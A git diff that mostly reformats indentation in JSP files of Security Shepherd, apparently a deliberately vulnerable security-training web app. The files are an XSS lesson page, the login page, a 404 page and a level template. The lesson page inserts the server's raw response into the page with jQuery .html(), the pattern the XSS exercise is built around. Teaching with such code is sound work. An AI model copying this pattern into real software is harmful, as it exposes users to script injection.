-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.2")%><br/> <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            XSS
-        </a> <br/> <br/>
-        <%= bundle.getString("example.xss.1") %><br/>
-        <%= bundle.getString("example.xss.2") %><br/>
-        <%= bundle.getString("example.xss.3") %><br/>
-        <%= bundle.getString("example.xss.4") %><br/> <br/> <br/> <input
-            type="button" value="<%= bundle.getString("button.hideIntro") %>"
-            id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/>
-    <%= bundle.getString("paragraph.whattodo.xss") %>
-    <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("paragraph.info.searchTerm") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="searchTerm" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("button.getUser") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %>
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button"
-                               value="<%= bundle.getString("sentence.question.wouldYouLikeHint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theSearchTerm = $("#searchTerm").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    searchTerm: theSearchTerm,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.2")%><br /> <br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				XSS
+			</a> <br /> <br />
+			<%= bundle.getString("example.xss.1") %><br />
+			<%= bundle.getString("example.xss.2") %><br />
+			<%= bundle.getString("example.xss.3") %><br />
+			<%= bundle.getString("example.xss.4") %><br /> <br /> <br /> <input
+				type="button" value="<%= bundle.getString("button.hideIntro") %>"
+				id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br />
+		<%= bundle.getString("paragraph.whattodo.xss") %>
+		<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("paragraph.info.searchTerm") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="searchTerm" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("button.getUser") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading") %></p>
+						<div style="display: none;" id="hintButton">
+							<input type="button"
+								value="<%= bundle.getString("sentence.question.wouldYouLikeHint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theSearchTerm = $("#searchTerm").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							searchTerm: theSearchTerm,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/loggedOutSheep.html b/src/main/webapp/loggedOutSheep.html
index d7d5aa9b9..4d2d8a618 100644
--- a/src/main/webapp/loggedOutSheep.html
+++ b/src/main/webapp/loggedOutSheep.html
@@ -1 +1 @@
-<img src="/css/images/loggedOutSheep.jpg"/>
\ No newline at end of file
+<img src="/css/images/loggedOutSheep.jpg" />
\ No newline at end of file
diff --git a/src/main/webapp/login.jsp b/src/main/webapp/login.jsp
index 29906cf6c..686169a4a 100644
--- a/src/main/webapp/login.jsp
+++ b/src/main/webapp/login.jsp
@@ -1,222 +1,221 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="utils.*, dbProcs.*, java.sql.Connection, org.owasp.encoder.Encode" %>
-<%@ include file="translation.jsp" %>
+	language="java"
+	import="utils.*, dbProcs.*, java.sql.Connection, org.owasp.encoder.Encode"%>
+<%@ include file="translation.jsp"%>
 
 <%
-    /**
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 * 
+	 * @author Mark Denihan
+	 */
 
-    HttpSession ses = request.getSession();
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-            "Sombody (" + ses.getAttribute("lang") + ") Conntected to login.jsp ...");
+	HttpSession ses = request.getSession();
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+			"Sombody (" + ses.getAttribute("lang") + ") Conntected to login.jsp ...");
 
-    if (request.getSession() != null) {
-        if (ses.getAttribute("loginFailed") == null && ses.getAttribute("registrationSuccess") == null
-                && ses.getAttribute("registerError") == null) {
-            ses.invalidate();
-            ses = request.getSession(true);
-            String language = request.getParameter("lang");
-            if (language != null) {
-                ses.setAttribute("lang", language);
-            }
+	if (request.getSession() != null) {
+		if (ses.getAttribute("loginFailed") == null && ses.getAttribute("registrationSuccess") == null
+				&& ses.getAttribute("registerError") == null) {
+			ses.invalidate();
+			ses = request.getSession(true);
+			String language = request.getParameter("lang");
+			if (language != null) {
+				ses.setAttribute("lang", language);
+			}
 
-        }
-    }
+		}
+	}
 
-    String url = (request.getRequestURL()).toString();
-    if (url.contains("login.jsp")) {
-        url = url.substring(0, url.lastIndexOf("/") + 1);
-    } else {
-        response.sendRedirect("login.jsp");
-    }
+	String url = (request.getRequestURL()).toString();
+	if (url.contains("login.jsp")) {
+		url = url.substring(0, url.lastIndexOf("/") + 1);
+	} else {
+		response.sendRedirect("login.jsp");
+	}
 
-    String registrationSuccess = new String();
-    String loginFailed = new String();
-    String registerError = new String();
+	String registrationSuccess = new String();
+	String loginFailed = new String();
+	String registerError = new String();
 
-    if (ses.getAttribute("loginFailed") != null) {
-        loginFailed = ses.getAttribute("loginFailed").toString();
-        ses.removeAttribute("loginFailed");
-    }
+	if (ses.getAttribute("loginFailed") != null) {
+		loginFailed = ses.getAttribute("loginFailed").toString();
+		ses.removeAttribute("loginFailed");
+	}
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <title>OWASP Security Shepherd - Login</title>
+<title>OWASP Security Shepherd - Login</title>
 
-    <link href="css/theCss.css" rel="stylesheet" type="text/css"
-          media="screen"/>
-    <link href="css/theResponsiveCss.css" rel="stylesheet" type="text/css"
-          media="screen">
+<link href="css/theCss.css" rel="stylesheet" type="text/css"
+	media="screen" />
+<link href="css/theResponsiveCss.css" rel="stylesheet" type="text/css"
+	media="screen">
 </head>
 <body>
-<script type="text/javascript" src="js/jquery.js"></script>
-<div id="wrapper">
-    <jsp:include page="translation-select.jsp"/>
-    <!-- start header -->
-    <div id="header">
-        <h1>Security Shepherd</h1>
-    </div>
-    <!-- end header -->
-    <!-- start page -->
-    <div id="page">
-        <!-- start content -->
-        <div id="content"
-             style="margin-right: auto; margin-left: auto; width: 40%; max-width: 320px;">
-            <div class="post">
-                <h1 class="title" id="login_title">
-                    <fmt:message key="generic.text.login"/>
-                </h1>
-                <%
-                    if (ScoreboardStatus.isPublicScoreboard()) {
-                %>
+	<script type="text/javascript" src="js/jquery.js"></script>
+	<div id="wrapper">
+		<jsp:include page="translation-select.jsp" />
+		<!-- start header -->
+		<div id="header">
+			<h1>Security Shepherd</h1>
+		</div>
+		<!-- end header -->
+		<!-- start page -->
+		<div id="page">
+			<!-- start content -->
+			<div id="content"
+				style="margin-right: auto; margin-left: auto; width: 40%; max-width: 320px;">
+				<div class="post">
+					<h1 class="title" id="login_title">
+						<fmt:message key="generic.text.login" />
+					</h1>
+					<%
+					if (ScoreboardStatus.isPublicScoreboard()) {
+						%>
 
-                <p id="scoreboard_link">
-                    <fmt:message key="login.text.scoreboard"/>
-                </p>
-                <%
-                    }
-                    if (!loginFailed.isEmpty()) {
-                %>
-                <p>
-                    <strong><font color="red"><%=loginFailed%>
-                    </font></strong>
-                </p>
-                <%
-                    }
-                    if (LoginMethod.isLogin()) {
-                %>
-                <p id="login-info">
-                    <fmt:message key="login.text.info"/>
-                        <%
+					<p id="scoreboard_link">
+						<fmt:message key="login.text.scoreboard" />
+					</p>
+					<%
+							}
+						if (!loginFailed.isEmpty()) {
+					%>
+					<p>
+						<strong><font color="red"><%=loginFailed%></font></strong>
+					</p>
+					<%
+						}
+						if (LoginMethod.isLogin()) {
+					%>
+					<p id="login-info">
+						<fmt:message key="login.text.info" />
+						<%
 							if (OpenRegistration.isEnabled()) {
 						%>
+					
+					<p id="register_info">
+						<fmt:message key="login.text.regInfo" />
+					</p>
+					<%
+							}
+					%>
+					<form name="loginForm" method="POST" action="login">
+						<table>
+							<tr>
+								<td><p>
+										<fmt:message key="generic.text.username" />
+										:</td>
+								<td><input type="text" name="login" value=""
+									autocomplete="OFF" autofocus />
+									</p></td>
+							</tr>
+							<tr>
+								<td><p>
+										<fmt:message key="generic.text.password" />
+										:&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+										&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
+								<td><input type="password" name="pwd" autocomplete="OFF" /><br /></td>
+							</tr>
+							<tr>
+								<td colspan="2" align="center"><fmt:message
+										key="generic.text.submit" var="buttonValue" /> <input
+									type="submit" name="submit" value="${buttonValue}" /></td>
+							</tr>
+						</table>
+					</form>
+					<%
+						} else if (LoginMethod.isSaml()) {
+					%>
+					<a id="login-saml" rel="nofollow" data-method="post"
+						href="saml/dologin"><span> Login via SAML </span> </a>
+					<%
+						}
+					%>
+					<br /> <br />
+					<div align="center">
+						<a id="tools" href="javascript:;"><fmt:message
+								key="login.text.proxy_question" /></a>
+						<div id="toolsTable" style="display: none;">
+							<p>
+								<fmt:message key="login.text.download_proxy" />
+								;
+							</p>
+							<table>
+								<tr>
+									<td align="center"><a
+										href="https://github.com/zaproxy/zaproxy/wiki/Downloads"><fmt:message
+												key="login.link.zap_win" /></a></td>
+								</tr>
+								<tr>
+									<td align="center"><a
+										href="https://github.com/zaproxy/zaproxy/wiki/Downloads"><fmt:message
+												key="login.link.zap_lin" /></a></td>
+								</tr>
+								<tr>
+									<td align="center"><a
+										href="https://github.com/zaproxy/zaproxy/wiki/Downloads"><fmt:message
+												key="login.link.zap_mac" /></a></td>
+								</tr>
+							</table>
+						</div>
+						<br> <a id="showAbout" href="javascript:;"><fmt:message
+								key="generic.text.aboutSecShep" /></a>
+					</div>
+				</div>
+			</div>
+			<div align="justify">
 
-                <p id="register_info">
-                    <fmt:message key="login.text.regInfo"/>
-                </p>
-                <%
-                    }
-                %>
-                <form name="loginForm" method="POST" action="login">
-                    <table>
-                        <tr>
-                            <td><p>
-                                <fmt:message key="generic.text.username"/>
-                                :</td>
-                            <td><input type="text" name="login" value=""
-                                       autocomplete="OFF" autofocus/>
-                                </p></td>
-                        </tr>
-                        <tr>
-                            <td><p>
-                                <fmt:message key="generic.text.password"/>
-                                :&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
-                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
-                            <td><input type="password" name="pwd" autocomplete="OFF"/><br/></td>
-                        </tr>
-                        <tr>
-                            <td colspan="2" align="center"><fmt:message
-                                    key="generic.text.submit" var="buttonValue"/> <input
-                                    type="submit" name="submit" value="${buttonValue}"/></td>
-                        </tr>
-                    </table>
-                </form>
-                <%
-                } else if (LoginMethod.isSaml()) {
-                %>
-                <a id="login-saml" rel="nofollow" data-method="post"
-                   href="saml/dologin"><span> Login via SAML </span> </a>
-                <%
-                    }
-                %>
-                <br/> <br/>
-                <div align="center">
-                    <a id="tools" href="javascript:;"><fmt:message
-                            key="login.text.proxy_question"/></a>
-                    <div id="toolsTable" style="display: none;">
-                        <p>
-                            <fmt:message key="login.text.download_proxy"/>
-                            ;
-                        </p>
-                        <table>
-                            <tr>
-                                <td align="center"><a
-                                        href="https://github.com/zaproxy/zaproxy/wiki/Downloads"><fmt:message
-                                        key="login.link.zap_win"/></a></td>
-                            </tr>
-                            <tr>
-                                <td align="center"><a
-                                        href="https://github.com/zaproxy/zaproxy/wiki/Downloads"><fmt:message
-                                        key="login.link.zap_lin"/></a></td>
-                            </tr>
-                            <tr>
-                                <td align="center"><a
-                                        href="https://github.com/zaproxy/zaproxy/wiki/Downloads"><fmt:message
-                                        key="login.link.zap_mac"/></a></td>
-                            </tr>
-                        </table>
-                    </div>
-                    <br> <a id="showAbout" href="javascript:;"><fmt:message
-                        key="generic.text.aboutSecShep"/></a>
-                </div>
-            </div>
-        </div>
-        <div align="justify">
-
-            <div id="aboutDiv" style="display: none;">
-                <h2 class="title">
-                    <fmt:message key="generic.text.aboutSecShep"/>
-                </h2>
-                <p id="about_shepherd_blurb">
-                    <fmt:message key="login.text.about_blurb"/>
-                </p>
-                <%=Analytics.sponsorshipMessage(new Locale(Validate.validateLanguage(request.getSession())))%>
-            </div>
-        </div>
-        <!-- end content -->
-        <!-- start sidebar -->
-        <!-- end sidebar -->
-    </div>
-</div>
-<!-- end page -->
-<script>
-    jQuery.fn.center = function () {
-        this.css("position", "absolute");
-        this.css("left", (($(window).width() - this.outerWidth()) / 2)
-            + $(window).scrollLeft() + "px");
-        return this;
-    }
+				<div id="aboutDiv" style="display: none;">
+					<h2 class="title">
+						<fmt:message key="generic.text.aboutSecShep" />
+					</h2>
+					<p id="about_shepherd_blurb">
+						<fmt:message key="login.text.about_blurb" />
+					</p>
+					<%=Analytics.sponsorshipMessage(new Locale(Validate.validateLanguage(request.getSession())))%>
+				</div>
+			</div>
+			<!-- end content -->
+			<!-- start sidebar -->
+			<!-- end sidebar -->
+		</div>
+	</div>
+	<!-- end page -->
+	<script>
+		jQuery.fn.center = function() {
+			this.css("position", "absolute");
+			this.css("left", (($(window).width() - this.outerWidth()) / 2)
+					+ $(window).scrollLeft() + "px");
+			return this;
+		}
 
-    $("#tools").click(function () {
-        $("#toolsTable").show("slow");
-    });
+		$("#tools").click(function() {
+			$("#toolsTable").show("slow");
+		});
 
-    $("#showAbout").click(function () {
-        $("#aboutDiv").show("slow");
-    });
-</script>
-<%
-    if (Analytics.googleAnalyticsOn) {
-%><%=Analytics.googleAnalyticsScript%>
-<%
-    }
-%>
+		$("#showAbout").click(function() {
+			$("#aboutDiv").show("slow");
+		});
+	</script>
+	<%
+		if (Analytics.googleAnalyticsOn) {
+	%><%=Analytics.googleAnalyticsScript%>
+	<%
+		}
+	%>
 </body>
 </html>
diff --git a/src/main/webapp/lostSheep.jsp b/src/main/webapp/lostSheep.jsp
index 6b81e534d..32cad6ef6 100644
--- a/src/main/webapp/lostSheep.jsp
+++ b/src/main/webapp/lostSheep.jsp
@@ -1,7 +1,7 @@
 <head>
-    <title>Error 404</title>
+<title>Error 404</title>
 </head>
 <body>
-<h1>Error 404</h1>
-<img src="${pageContext.request.contextPath}/css/images/lostSheep.jpg"/>
+	<h1>Error 404</h1>
+	<img src="${pageContext.request.contextPath}/css/images/lostSheep.jpg" />
 </body>
\ No newline at end of file
diff --git a/src/main/webapp/mobileLevelTemplate.jsp b/src/main/webapp/mobileLevelTemplate.jsp
index 35179c4cf..de0f90e17 100644
--- a/src/main/webapp/mobileLevelTemplate.jsp
+++ b/src/main/webapp/mobileLevelTemplate.jsp
@@ -1,41 +1,45 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*, org.owasp.encoder.Encode" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*, org.owasp.encoder.Encode" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
 
-    //MUST be in English and no Quotes In level Name
-    String levelName = "Level Name";
+//MUST be in English and no Quotes In level Name
+String levelName = "Level Name";
 //Alphanumeric Only
-    String levelHash = "Level Hash";
+String levelHash = "Level Hash";
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("title.");
-    try {
-        if (request.getSession() != null) {
-            HttpSession ses = request.getSession();
-            String userName = (String) ses.getAttribute("decyrptedUserName");
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + userName, ses.getAttribute("userName"));
-        }
-    } catch (Exception e) {
-        ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed");
-        ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not recover username: " + e.toString());
-    }
+String i18nLevelName = bundle.getString("title.");
+try
+{
+	if (request.getSession() != null)
+	{
+		HttpSession ses = request.getSession();
+		String userName = (String) ses.getAttribute("decyrptedUserName");
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + userName, ses.getAttribute("userName"));
+	}
+}
+catch (Exception e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not recover username: " + e.toString());
+}
 /**
  * <br/><br/>
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
  *
@@ -44,82 +48,81 @@
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
-    </script>
+</script>
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>template
-    </h2>
-    <p>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %>template
+		</h2>
+		<p>
 
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <% /* IF you need a form - Present it like this */ %>
-        <%
-            /*
-            <br />
-            <br />
-            <form id="leForm" action="javascript:;">
-                <table>
-                <tr><td>
-                    <div id="submitButton">
-                    <input type="submit" value="Get Info"/></div>
-                    <p style="display: none;" id="loadingSign">Loading...</p>
-                    <div style="display: none;" id="hintButton"><input type="button" value="Would you like a hint?" id="theHintButton"/></div>
-                </td></tr>
-                </table>
-            </form>
-
-            <div id="resultsDiv"></div>
-            */
-        %>
-    </p>
-</div>
-<% /*If you need to call the Server Do it like this */ %>
-<%
-    /*
-    <script>
-        $("#leForm").submit(function(){
-            var theVariableName = $("#variableName").val();
-            var theSecondVariableName = $("#secondVariableName").val();
-            $("#submitButton").hide("fast");
-            $("#loadingSign").show("slow");
-            $("#resultsDiv").hide("slow", function(){
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "<ChangeThis= levelHash ChangeThis>",
-                    data: {
-                        variableName: theVariableName,
-                        secondVariableName: theSecondVariableName
-                    },
-                    async: false
-                });
-                if(ajaxCall.status == 200)
-                {
-                    $("#resultsDiv").html(ajaxCall.responseText);
-                }
-                else
-                {
-                    $("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                }
-                $("#resultsDiv").show("slow", function(){
-                    $("#loadingSign").hide("fast", function(){
-                        $("#submitButton").show("slow");
-                    });
-                });
-            });
-        });
-    </script>
-    */
-%>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<% /* IF you need a form - Present it like this */ %>
+			<%
+				/*
+				<br />
+				<br />
+				<form id="leForm" action="javascript:;">
+					<table>
+					<tr><td>			
+						<div id="submitButton">
+						<input type="submit" value="Get Info"/></div>
+						<p style="display: none;" id="loadingSign">Loading...</p>
+						<div style="display: none;" id="hintButton"><input type="button" value="Would you like a hint?" id="theHintButton"/></div>
+					</td></tr>
+					</table>
+				</form>
+				
+				<div id="resultsDiv"></div>
+				*/
+				%>
+		</p>
+	</div>
+	<% /*If you need to call the Server Do it like this */ %>
+	<%
+		/*
+		<script>
+			$("#leForm").submit(function(){
+				var theVariableName = $("#variableName").val();
+				var theSecondVariableName = $("#secondVariableName").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<ChangeThis= levelHash ChangeThis>",
+						data: {
+							variableName: theVariableName, 
+							secondVariableName: theSecondVariableName
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+		*/
+		%>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
diff --git a/src/main/webapp/readyToPlay.jsp b/src/main/webapp/readyToPlay.jsp
index f852edbe9..4d684d0cb 100644
--- a/src/main/webapp/readyToPlay.jsp
+++ b/src/main/webapp/readyToPlay.jsp
@@ -1,71 +1,80 @@
-<%@ page import="org.owasp.encoder.Encode, utils.ShepherdLogManager" %>
+<%@ page import="org.owasp.encoder.Encode, utils.ShepherdLogManager"%>
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ include file="translation.jsp" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ include file="translation.jsp"%>
 <%
-    /**
-     * This file assigns the tracking cookie for the exposed server
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelName = new String("ReadyToPlay.jsp");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ": tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+/**
+ * This file assigns the tracking cookie for the exposed server
+ * <br/><br/>
